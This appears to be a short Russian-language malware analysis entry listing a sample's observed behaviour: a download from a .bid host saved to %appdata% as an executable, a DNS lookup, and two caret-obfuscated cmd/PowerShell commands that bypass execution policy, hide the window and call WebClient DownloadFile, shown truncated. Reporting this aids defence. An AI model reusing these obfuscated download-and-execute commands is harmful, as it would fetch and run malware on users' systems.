Техническая информация
- http://ranumseh.bid/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "powERsh^ell.^E^Xe -EXe^C^u^T^I^On^PO^liCY B^ypas^S -NoP^ROF^iLe -wInDow^sty^Le HI^D^dEN ^(n^e^w-^OBJeC^T^ ^systEm^.NET^.W^ebC^lI^e^nT).d^OW^Nl^OAdf^ILe^('http://ranumseh.bid/read...
- DNS ASK ra###seh.bid
- '<SYSTEM32>\cmd.exe' /c "powERsh^ell.^E^Xe -EXe^C^u^T^I^On^PO^liCY B^ypas^S -NoP^ROF^iLe -wInDow^sty^Le HI^D^dEN ^(n^e^w-^OBJeC^T^ ^systEm^.NET^.W^ebC^lI^e^nT).d^OW^Nl^OAdf^ILe^('http://ranumseh.bid/read...' (со скрытым окном)